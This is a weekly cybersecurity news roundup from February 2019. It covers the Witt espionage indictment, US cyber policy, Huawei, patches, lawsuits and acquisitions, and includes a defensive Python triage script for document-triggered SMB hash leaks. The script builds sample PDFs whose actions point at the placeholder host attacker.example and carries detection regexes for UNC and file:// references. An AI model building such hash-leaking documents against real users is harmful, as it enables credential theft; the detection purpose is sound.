The Week that Was.
February 16, 2019.
By the CyberWire staff
An espionage indictment, with notes on social engineering.
The US Department of Justice on Wednesday unsealed an indictment against Monica Elfriede Witt, a former US Air Force technical sergeant who served as a counterintelligence specialist and Farsi linguist between 1997 and 2008, alleging that she gave highly classified information to Iran's government. She served four years in the Middle East collecting signals intelligence (NPR), then left the Air Force in 2008 and spent the next two years working for Federal contractors. Ms Witt held a top-secret security clearance while on active duty and during her subsequent two years as a contractor.
Ms Witt's turn in sympathies became publicly apparent around February 2012, when she traveled to Iran to attend a New Horizon Organization conference on the depravity of American popular culture ("Hollywoodism," as New Horizon called it). Around the same time she appeared in videos "making statements that were critical of the US government, knowing these videos would be broadcast by Iranian media outlets" (BBC).
In May 2012 the FBI warned Ms Witt that Iranian intelligence services were targeting her for recruitment. She assured the FBI that she wouldn't share classified information with the Iranians. In February 2013, Witt returned to Iran to attend another conference, and again appeared in videos identifying herself as a US veteran and criticizing the US government.
In early 2013 Ms Witt exchanged messages with an Iranian individual, expressing her willingness to provide information. She was frustrated that the Iranians were suspicious of her sincerity, and said she was considering taking the information to Russia or Wikileaks instead, "do[ing] like Snowden" and making the information public (Washington Post). She defected to Iran in August 2013, and there compiled dossiers on her former colleagues in counterintelligence. Those "target packages" were used by the Iranians to conduct spearphishing and other social engineering attacks against US government agents. Some attacks enjoyed at least partial success, including attempts to connect people who should have known better with a catphish (a fabricated online persona used to build trust before the malicious link or attachment arrives). Target packages are a serious business, used as they are to locate, track, compromise, and even capture or kill specific individuals.
The indictment also charges four Iranian men with actually conducting the attacks. When the indictment was unsealed, the US Treasury Department announced sanctions against New Horizon Organization and its organizers, as well as an Iranian IT company that supported the hacking operations (CyberScoop).
Ms Witt was awarded an Air Medal during her time on active duty. What did she do to earn it? Worked aboard an RC-135 Rivet Joint surveillance aircraft during the 2003 Gulf War (Air Force Times). Not everyone gets to serve as Rivet Joint aircrew.
The US Administration has doubled down on its aggressive strategy in cyberspace, an approach that has won tentative praise from security experts. An example of this may be seen in US Cyber Command's secretive (yet coyly alluded to in testimony before the Senate this week) operations to deter Russian disinformation campaigns (Manila Times). The New York Times reported in October that Cyber Command was contacting Russian individuals directly and letting them know that they were being watched. In an interview with Joint Force Quarterly, Cyber Command's commander and NSA director General Paul Nakasone outlined the concept of "persistent engagement," which includes "defending forward."
A majority of cybersecurity experts surveyed by the Washington Post believe this is a generally sound strategy, although many advise some additional oversight by Government civilian agencies.
A piece in Fifth Domain argues for an even more assertive form of retaliation for cyberattacks: the US should respond proportionately with kinetic weapons that have two of the advantages cyber weapons enjoy—plausible deniability and significant but non-lethal damage. Deniability would presumably be important in avoiding escalation, but for now at least the US appears content with defending forward.
The State Department's Global Engagement Center (GEC), its counter-propaganda office, will receive a $55 million budget in 2019, and Congress may increase that to $115 million (Foreign Policy). Navy veteran and former journalist Lea Gabrielle took over the GEC on February 11th. She believes China, Russia, Iran, and terrorist organizations represent the top propaganda threats to the US (Foreign Policy).
Sino-American cyber competition.
The US and a number of its allies remain suspicious of Chinese device manufacturers as potential security threats. The University of California, Berkeley, has banned new research projects with Huawei, as well as all future funding or gifts from the company or its subsidiaries and affiliates. The ban took effect on January 30th, two days after the US Department of Justice indicted the company for stealing trade secrets and violating international sanctions. Huawei has given the school $7.8 million in funding over the past two years (South China Morning Post).
President Trump is still expected to sign an Executive Order that would effectively ban Huawei and other Chinese manufacturers from participating in US mobile networks. The order has been anticipated for months, but US officials now say it could be issued within days (New York Times). POLITICO said the order was likely to be signed before Mobile World Congress Barcelona, which begins on February 25th, but as of this writing it hasn't been. Ahead of Barcelona, European telecommunications providers say they'd prefer an EU-wide security testing system that would address threats as they were found, and before they were introduced into 5G networks (Reuters). US rural carriers have also expressed reservations about a proposed ban because Huawei offers affordable and reliable equipment (Wall Street Journal).
Two US cabinet secretaries, Secretary of State Pompeo (BankInfoSecurity) and Defense Secretary Shanahan (Bloomberg) urged European allies to take the threat of Chinese espionage more seriously.
The US Executive Order on artificial intelligence.
President Trump on Monday signed an Executive Order meant to maintain American leadership in the realm of artificial intelligence in the face of relentless Chinese competition. The US AI Initiative will be coordinated through the National Science and Technology Council (NSTC) Select Committee on Artificial Intelligence, which will determine the government agencies primarily responsible for conducting foundational research, development, and deployment of AI technologies.
While the order directs agencies to prioritize AI funding when planning their existing budgets, any additional funding would have to come from Congress. Some observers have criticized this aspect of the order, pointing out that even individual cities in China are pouring billions of dollars into AI initiatives (Recode). Harvard Professor Jason Furman, who worked on the Obama administration's 2016 report on artificial intelligence, told Technology Review that the Trump administration's initiative "includes all of the right elements," and "the critical test will be to see if they follow through in a vigorous manner."
Not only is AI a family of technologies with significant application to cybersecurity, but it's also an occasion of conflict in cyberspace, especially since AI leadership is as much a Chinese national economic and security aspiration as it is an American goal.
Apple's iOS 12.1.4 update fixes two zero-day vulnerabilities that were being exploited in the wild. One of the zero-days was a memory corruption flaw that allowed an application to gain elevated privileges. The other allowed an application to execute arbitrary code with kernel privileges. The update also patches the Group FaceTime flaw that essentially allowed users' devices to be turned into hot mics (SecurityWeek).
Chrome OS 72 improves the security of Shill, Chromium's network connection manager, by placing it in a sandbox and removing its root privileges (SecurityWeek).
0patch released a temporary micropatch for an Adobe Reader DC zero-day that could let a booby-trapped PDF make the reader issue an SMB request to an attacker-controlled host, leaking the user's NTLM credential hash in the process. The micropatch warns the user and asks for confirmation before the SMB request is sent. Adobe told Threatpost that it plans to release an official fix this week. The usual network-level mitigation for this class of hash-leak bug applies in the meantime: block outbound SMB (TCP 445) at the perimeter so that a document can't reach an attacker's server in the first place.
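As an added example (not 0patch's micropatch, and not a signature for the specific Reader DC bug, whose exact trigger the page doesn't describe), the following Python script illustrates a coarse triage check for the general class of document-triggered SMB leaks: it scans a PDF, inflating FlateDecode streams where it can, for references that would make a reader name a remote host, namely UNC paths, file:// URLs with a hostname, and xml-stylesheet processing instructions pointing at remote resources. The sample PDFs are constructed inside the script, and the hostname attacker.example and every regex are this example's own assumptions.

```python
"""Heuristic triage of PDFs for references that can trigger an outbound SMB request.

Added example for illustration; not 0patch's micropatch and not a signature for
the specific Adobe Reader DC flaw. The regexes are coarse on purpose: anything
that makes a document reader name a remote host deserves a look.
"""
import re
import zlib

# Each check: (label, regex whose group 1 is the suspicious reference).
# Backslashes in PDF literal strings are escaped, so a UNC path \\host\share
# shows up in the file as \\\\host\\share; the quantifiers allow both forms.
CHECKS = [
    ("unc-path", re.compile(
        rb'(\\{2,4}[A-Za-z0-9][A-Za-z0-9.\-]*\\{1,2}[A-Za-z0-9$._\-]+)')),
    ("file-url", re.compile(
        rb'(file://[A-Za-z0-9][A-Za-z0-9.\-]*/[^\s)>"\'<]*)')),
    ("xml-stylesheet", re.compile(
        rb'<\?xml-stylesheet[^>]*?href\s*=\s*["\']((?:https?|file)://[^"\']+)')),
]

STREAM_RE = re.compile(rb'stream\r?\n(.*?)\r?\nendstream', re.DOTALL)


def _views(data):
    """Yield the raw file, then every stream body that inflates as zlib (FlateDecode)."""
    yield data
    for m in STREAM_RE.finditer(data):
        try:
            yield zlib.decompress(m.group(1))
        except zlib.error:
            pass  # uncompressed or differently encoded; the raw view already covers it


def scan_pdf(data):
    """Return a de-duplicated list of {'kind', 'ref'} findings for one PDF."""
    findings, seen = [], set()
    for view in _views(data):
        for kind, rx in CHECKS:
            for m in rx.finditer(view):
                ref = m.group(1).decode("latin-1")
                if (kind, ref) not in seen:
                    seen.add((kind, ref))
                    findings.append({"kind": kind, "ref": ref})
    return findings


def build_pdf(uri_target, stream_body, compress):
    """Assemble a minimal PDF with a /URI OpenAction and one content stream.

    Constructed sample generator for this example only; the output is not a
    reproduction of any real exploit document.
    """
    filt = b""
    if compress:
        stream_body = zlib.compress(stream_body)
        filt = b"/Filter /FlateDecode "
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /Contents 5 0 R >>",
        b"<< /Type /Action /S /URI /URI (" + uri_target + b") >>",
        b"<< /Length %d %s>>\nstream\n" % (len(stream_body), filt)
        + stream_body + b"\nendstream",
    ]
    out = b"%PDF-1.7\n"
    for num, body in enumerate(objs, 1):
        out += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    return out + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


# Constructed samples; attacker.example is a placeholder host.
CLEAN_PDF = build_pdf(b"https://example.org/benign", b"BT /F1 12 Tf (Hello) Tj ET", True)
UNC_PDF = build_pdf(b"\\\\\\\\attacker.example\\\\share\\\\decoy.pdf",
                    b"BT /F1 12 Tf (Hello) Tj ET", False)
XSL_PDF = build_pdf(
    b"https://example.org/benign",
    b'<?xml-stylesheet type="text/xsl" href="file://attacker.example/share/s.xsl"?>\n<root/>',
    True)

if __name__ == "__main__":
    for name, pdf in (("clean", CLEAN_PDF), ("unc", UNC_PDF), ("xsl", XSL_PDF)):
        print(name, scan_pdf(pdf))
```

The point of inflating streams is that the interesting reference in this kind of document usually sits inside a compressed object, not in the plaintext of the file; a grep for `\\` over the raw bytes misses it. Treat hits as leads for a sandbox detonation, not verdicts: a benign document can legitimately link to an internal share.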
On Patch Tuesday, Adobe released fixes for critical and important vulnerabilities in Adobe Flash Player, ColdFusion, and the Creative Cloud Desktop Application installer. The flaws could lead to privilege escalation, information disclosure, and arbitrary code execution (BleepingComputer).
Microsoft issued patches for 77 security vulnerabilities across Windows and its other products, around 20 of which were rated critical (ZDNet). One of these vulnerabilities was a zero-day in Internet Explorer that was being actively exploited (KrebsOnSecurity).
Crime and punishment.
A leading (alleged) Apophis Squad skid, Mr. Timothy Dalton Vaughn (noms-de-hack "HDGZero," "WantedByFeds," and "Xavier Farbel"), was indicted by the Feds after his identity was compromised via a hacked gaming site. One of his alleged confederates, Mr. George Duke-Cohan (whose noms-de-hack are too colorless to warrant mention), was also indicted. Their alleged activities included swatting, DDoS, doxing, bomb threats, the whole sad customary run of skid lulz (KrebsOnSecurity).
Courts and torts.
The US Federal Trade Commission is negotiating a multi-billion-dollar settlement with Facebook over privacy issues (Washington Post).
Huawei is threatening to sue Czech cyber watchdog NÚKIB unless it retracts warnings issued in December 2018 calling Huawei and ZTE "security threats" (Epoch Times).
Apple is being sued by New Yorker Jay Brodsky for requiring its users to use two-factor authentication to access some features. Brodsky's lawsuit claims that logging in with 2FA takes up to five minutes, and that the time lost is causing him "economic losses." Also, while it's not clear how Apple is making money from such two-factor authentication, Brodsky wants the company to pay him back its "ill-gotten gains" (Naked Security).
A Scottish company, Peebles Media of Glasgow, is suing a former employee who fell for a business email compromise (BEC) scam that cost the company £200,000 (BBC). The company says the employee was careless and should have known better, but Trend Micro believes it would be more constructive to focus on improving training and process controls, such as out-of-band confirmation of payment requests, than to sue employees.
Policies, procurements, and agency equities.
General Paul Nakasone, Director NSA and commander of US Cyber Command, told the Senate Thursday that the nature and operational tempo of the threat is such that Cyber Command will need to expand, moving beyond its present workforce and the 133 teams currently organized. Senators wanted some specific spy stories, particularly about Russia and China, but the General dodged artfully (FCW). He did say both China and Russia remained active threats, and that Russian influence operations were a matter of particular concern (Meritalk). He also claimed some success for the new US "defend forward" strategy, which he said has worked where deterrence has not (Fifth Domain).
The Pentagon is spending tens of millions of dollars on new cyber training centers for the US military. The Air Force will issue a Request for Proposals for a $30 million expansion of its CyberWorx project later this month. The US Army's Cyber Center of Excellence issued a Request for Information regarding cybersecurity training and exercises. The Army also released a solicitation outlining its plans to build four new cyber ranges—two in Florida, one in South Carolina, and one in Maryland (Fifth Domain).
Christopher Krebs, head of the Cybersecurity and Infrastructure Security Agency (CISA), told Congress on Wednesday that the ability to audit infrastructure is the key to ensuring election integrity (FCW).
Fortunes of commerce.
US Representative Adam Schiff (Democrat of California) sent Facebook CEO Mark Zuckerberg a letter requesting that the social network remove anti-vaccination content from its platform. Representative Schiff cast the matter as a public health issue: he’s concerned about the implications of falling vaccination rates. But there's growing interest by many governments in content moderation generally.
Mergers and acquisitions.
Most small and mid-size businesses still haven't migrated to the cloud, so the cybersecurity market is expected to continue growing. David Wagner, CEO of data protection services provider Zix, says that the trend toward cloud migration spurred his company's purchase of AppRiver, a provider of e-mail and web protection services. Wagner points out that "we’re still in the early innings of cloud migration," so "cybersecurity will remain a robust environment for M&A" (Mergers & Acquisitions).
It's also worth noting, as SC Magazine does, that mergers and acquisitions represent security as well as business and financial inflection points. Marriott's major data breach, for example, had its roots in the hotel chain's Starwood acquisition: the intruders were already inside Starwood's reservation system before Marriott bought the company in 2016, and they weren't found until 2018. Pre-acquisition security due diligence and a compromise assessment of the acquired network before it's connected to the buyer's are the practical lesson.
Identity data intelligence shop GBG (headquartered in Chester, England) has conditionally agreed to acquire Atlanta, Georgia-based IDology. IDology's fraud prevention and identity verification services are expected to complement GBG's offerings, especially in North American markets. It's an all-cash deal with a $300-million price tag (Bankless Times).
As part of a push into North American markets, Stockholm-based Baffin Bay Networks (a cloud-native threat prevention company with significant customers in the financial services sector) has acquired Loryka. Headquartered in Vancouver, Washington, Loryka is a research shop specializing in botnets and the IoT (CISO Magazine).
Symantec has bought Israeli start-up Luminate Security, whose Secure Access Cloud offering will be merged into Symantec’s Integrated Cyber Defense Platform (CRN).
Qualys has acquired the software assets of Adya, a San Francisco-based cloud security startup that specializes in securing SaaS applications (CRN).
Investments and exits.
Francisco Partners, which for several years has been looking for a buyer willing to take controversial lawful intercept (or spyware) company NSO Group off its hands, has succeeded. The company's founders are buying it back, with the assistance of Novalpina and the Jefferies Group (Fast Company). Terms weren't disclosed, but Ha'aretz says the 60% of the company Shalev Hulio and Omri Lavie purchased with their partners puts a value of about $1 billion on the firm.
C2A Security, a Jerusalem-based start-up that offers on-board cybersecurity systems to protect connected vehicles, has raised $6.5 million in a Series A round. Maniv Mobility and ICV led the investment, with participation from Labs/02 (AP).
RSAC 2019 Innovation Sandbox finalist Axonius has closed a $13-million Series A round. The company intends to use the funds to further develop the Axonius Cybersecurity Asset Management Platform, which automates various security management and policy activities. Bessemer Venture Partners led the round. Existing investors YL Ventures, Vertex, WTI, and Emerge also participated.
Elevate Security announced an $8-million Series A round, led by Defy Partners with participation by existing investor Costanoa Ventures. San Francisco-based Elevate says its Security Behavior solution "motivates, measures and rewards employees to change their security habits, while at the same time giving security teams unprecedented visibility into the security habits and actions of their employees" (TechCrunch).
Today's issue includes events affecting China, Czech Republic, European Union, Hungary, Iran, Israel, Poland, Russia, Slovakia, Spain, United Kingdom, United States.
A quick reminder: this Monday, February 18th, is Presidents' Day, and as is our custom on US Federal holidays, we won't publish either the Daily News Briefing or the Daily Podcast. Both will be back, as usual, on Tuesday. Enjoy the holiday if you're here in the US.
ON THE PODCAST
Research Saturday is up. In this episode, "Seedworm digs Middle East intelligence," we talk with Symantec's Al Cooley, who reviews their research into the Seedworm cyber espionage group. Seedworm has been targeting the Middle East as well as Europe and North America. The threat group goes after government agencies, oil and gas facilities, NGOs, telecoms, and IT firms. Al Cooley is director of product management at Symantec, and he joins us to share their findings.